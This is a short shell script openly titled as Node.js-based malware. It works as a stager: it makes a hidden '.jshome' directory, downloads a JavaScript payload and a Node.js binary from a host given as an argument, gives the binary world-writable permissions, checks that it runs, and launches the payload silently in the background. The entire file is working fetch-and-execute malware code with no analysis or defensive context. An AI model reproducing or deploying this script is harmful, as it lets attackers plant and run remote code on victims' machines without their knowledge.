malware built around node.js

node-js-malware.sh

#!/bin/sh

DIRNAME='.jshome'
MACHINE_TYPE=`uname -m`
mkdir $DIRNAME
cd $DIRNAME
if [ $? != 0 ];
then
    echo 'exiting'
    exit
fi

if [ -f nodejs ]; then
    size=$(stat --printf="%s" nodejs);
    if (( $size < 27000000 )); then
	rm -f nodejs
    fi
fi 

if [ ! -s index1.js ]; then
    rm -f index1.js
fi

echo '---'

if [ ! -s ./nodejs ]; then
    echo '123';
    rm -f nodejs
fi
echo '___'

function download {
    if curl $1 > $2; then echo 'curl ok'; else wget $1 -O $2; fi;
}

node_works() {
    ./nodejs -e '1+1' -p > err1 2> err1
    output=$(cat err1)
    if [[ $output == '2' ]]; then
	echo '1'
    else
	echo '0'
    fi 
}

rm -f index1.js
if [ ! -f index1.js ]; then
    echo 'downloading index1.js'
    download $1/jsb/index1.js index1.js
    echo 'downloaded'
fi

echo 'fi'

if [ ! -f nodejs ]; then
    echo 'downloading nodejs'    
    if [ ${MACHINE_TYPE} == 'x86_64' ]; then
	echo 'for 64 bit'
	download $1/jsb/node64linux nodejs
    else
	echo 'for 32 bit'	
	download $1/jsb/node32linux nodejs
    fi
    chmod 777 nodejs
fi

echo 'there is node js'

if [ $(node_works) == '1' ] ; then
    echo 'works all good'
else
    echo 'node deos not work yet'
    if [ ${MACHINE_TYPE} == 'x86_64' ]; then
	echo 'downloading 32 bit node'
	download $1/jsb/node32linux nodejs
	chmod 777 nodejs    
	if [ $(node_works) == 1 ] ; then
	    echo 'works all good'
	else
	    echo 'does not work'
	fi 
    else
	echo 'does not work'
    fi
fi

./nodejs index1.js $2 $3 > out 2> err &
echo 'done';